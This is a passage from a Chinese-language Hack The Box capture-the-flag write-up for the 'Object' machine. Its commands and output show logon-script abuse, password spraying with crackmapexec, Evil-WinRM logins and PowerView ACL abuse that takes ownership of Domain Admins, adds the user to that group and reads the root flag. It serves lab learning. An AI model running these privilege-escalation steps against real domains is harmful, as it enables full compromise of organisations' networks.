*Evil-WinRM* PS C:\Temp> Set-DomainObject -Identity maria -SET @{scriptpath='C:\Temp\file.ps1'}
*Evil-WinRM* PS C:\Temp> ls


    Directory: C:\Temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/26/2021   8:13 AM           6144 Engines.xls
-a----        4/15/2024   8:09 AM             60 file.ps1
-a----        4/15/2024   8:09 AM            830 out.txt
-a----        4/15/2024   8:06 AM             45 test.ps1


*Evil-WinRM* PS C:\Temp> download Engines.xls
                                        
Info: Downloading C:\Temp\Engines.xls to Engines.xls
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Temp>

http://sh1yan.top/photo/Object-htb-writeup/Engines.xls

1
2
3
4
Name	Quantity	Date Acquired	Owner	Chamber Username	Chamber Password
Internal Combustion Engine	12	10/02/21	HTB	maria	d34gb8@
Stirling Engine	23	11/05/21	HTB	maria	0de_434_d545
Diesel Engine	4	02/03/21	HTB	maria	W3llcr4ft3d_4cls

28、这里获取到密码了,就开始枚举了,看看哪个密码是对的

1
2
3
4
5
6
7
8
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.11.132 -u maria -p ./passwd.txt                          
SMB         10.10.11.132    5985   NONE             [*] None (name:10.10.11.132) (domain:None)
HTTP        10.10.11.132    5985   NONE             [*] http://10.10.11.132:5985/wsman
WINRM       10.10.11.132    5985   NONE             [-] None\maria:d34gb8@
WINRM       10.10.11.132    5985   NONE             [-] None\maria:0de_434_d545
WINRM       10.10.11.132    5985   NONE             [+] None\maria:W3llcr4ft3d_4cls (Pwn3d!)
WINRM       10.10.11.132    5985   NONE             [-] None\maria:W3llcr4ft3d_4cls "'NoneType' object has no attribute 'upper'"

29、尝试该密码并登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.132 -u maria -p 'W3llcr4ft3d_4cls'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maria\Documents>
*Evil-WinRM* PS C:\Users\maria\Documents> whoami
object\maria
*Evil-WinRM* PS C:\Users\maria\Documents>

30、那也就是到了最后一个账号的利用过程了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
用户MARIA@OBJECT.LOCAL能够修改组DOMAIN的所有者ADMINS@OBJECT.LOCAL.

对象所有者保留修改对象安全描述符的能力,而不管对象的DACL上的权限如何。


要更改对象的所有权,可以使用PowerView中的Set DomainObjectOwner函数。

您可能需要向域控制器进行身份验证,身份为MARIA@OBJECT.LOCAL如果您不是以该用户的身份运行进程。要与Set DomainObjectOwner一起执行此操作,请首先创建一个PSCredential对象(这些示例来自PowerView帮助文档):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

然后,使用Set-DomainObjectOwner,如果您还没有将进程作为MARIA@OBJECT.LOCAL:

Set-DomainObjectOwner -Credential $Cred -TargetIdentity "Domain Admins" -OwnerIdentity harmj0y

若要滥用用户对象的所有权,您可以授予自己AddMember权限。这可以使用PowerView中的Add-DomainObjectAcl函数来完成。

您可能需要向域控制器进行身份验证,身份为MARIA@OBJECT.LOCAL如果您不是以该用户的身份运行进程。要与Add-DomainObjectAcl一起执行此操作,请首先创建一个PSCredential对象(这些示例来自PowerView帮助文档):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

然后,使用Add-DomainObjectAcl,如果您还没有将进程作为MARIA@OBJECT.LOCAL:

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Domain Admins" -Rights WriteMembers
You can now add members to the group using the net binary or PowerView's Add-DomainGroupMember.

至少有两种方法可以执行此攻击。第一个也是最明显的是在Windows中使用内置的net.exe二进制文件(例如:net group“Domain Admins”harmj0y/add/Domain)。请参阅opsec注意事项选项卡,了解为什么这可能是个坏主意。第二种方法,也是强烈推荐的方法,是使用PowerView中的Add-DomainGroupMember函数。此函数在某些方面优于使用net.exe二进制文件。例如,您可以提供备用凭据,而不需要以具有AddMember权限的用户身份运行进程或登录。此外,与生成net.exe相比,您有更安全的执行选项(请参阅opsec选项卡)。

若要使用PowerView的Add DomainGroupMember滥用此权限,请首先将PowerView导入代理会话或控制台的PowerShell实例。您可能需要向域控制器进行身份验证,身份为MARIA@OBJECT.LOCAL如果您不是以该用户的身份运行进程。要与Add DomainGroupMember一起执行此操作,请首先创建一个PSCredential对象(这些示例来自PowerView帮助文档):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

然后,使用Add-DomainGroupMember,如果您还没有将进程作为MARIA@OBJECT.LOCAL:

Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred

最后,使用PowerView的Get-DomainGroupMember验证用户是否已成功添加到组中:

Get-DomainGroupMember -Identity 'Domain Admins'

可以使用Remove-DomainObjectAcl对此进行清理

Remove-DomainObjectAcl - Credential $cred -TargetIdentity "Domain Admins" -Rights WriteMembers

可以再次使用Set-DomainObjectOwner来清理所有者

31、到了最后一个利用环节了,那就直接参考演练报告利用吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Import-Module .\PowerView.ps1

将Maria设置为Domain Admins组的所有者。

Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity maria

将Domain Admins组中的所有权限授予Maria。

Add-DomainObjectAcl -PrincipalIdentity maria -TargetIdentity "Domain Admins" -Rights All

最后将Maria添加到域管理员组。

net group "Domain Admins" maria /add /domain

作为最后一步,我们将寻找标志。

Get-ChildItem -Path C:\Users -Recurse -Include root.txt,user.txt | select Fullname

32、操作并执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
*Evil-WinRM* PS C:\Users\maria\Documents> ls
*Evil-WinRM* PS C:\Users\maria\Documents> upload /home/kali/Desktop/tools/PowerSploit/PowerView.ps1
                                        
Info: Uploading /home/kali/Desktop/tools/PowerSploit/PowerView.ps1 to C:\Users\maria\Documents\PowerView.ps1
                                        
Data: 1027036 bytes of 1027036 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\maria\Documents> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\maria\Documents> Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity maria
*Evil-WinRM* PS C:\Users\maria\Documents> Add-DomainObjectAcl -PrincipalIdentity maria -TargetIdentity "Domain Admins" -Rights All
*Evil-WinRM* PS C:\Users\maria\Documents> net group "Domain Admins" maria /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\maria\Documents> Get-ChildItem -Path C:\Users -Recurse -Include root.txt,user.txt | select Fullname
Access to the path 'C:\Users\Administrator' is denied.
At line:1 char:1
+ Get-ChildItem -Path C:\Users -Recurse -Include root.txt,user.txt | se ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\Administrator:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Access to the path 'C:\Users\oliver' is denied.
At line:1 char:1
+ Get-ChildItem -Path C:\Users -Recurse -Include root.txt,user.txt | se ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\oliver:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Access to the path 'C:\Users\Public' is denied.
At line:1 char:1
+ Get-ChildItem -Path C:\Users -Recurse -Include root.txt,user.txt | se ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\Public:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Access to the path 'C:\Users\smith' is denied.
At line:1 char:1
+ Get-ChildItem -Path C:\Users -Recurse -Include root.txt,user.txt | se ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\smith:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\maria\Documents>

33、看来得重新登录下了,再获取最终的flag信息了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.132 -u maria -p 'W3llcr4ft3d_4cls'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maria\Documents> Get-ChildItem -Path C:\Users -Recurse -Include root.txt,user.txt | select Fullname

FullName
--------
C:\Users\Administrator\Desktop\root.txt
C:\Users\oliver\Desktop\user.txt


*Evil-WinRM* PS C:\Users\maria\Documents> cat C:\Users\Administrator\Desktop\root.txt
03701254829c810c8a18df6bed370be2
*Evil-WinRM* PS C:\Users\maria\Documents>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/447

打靶记
#shooting-range
Object-htb-writeup
https://sh1yan.top/2024/04/15/Object-htb-writeup/
作者
shiyan
发布于
2024年4月15日
许可协议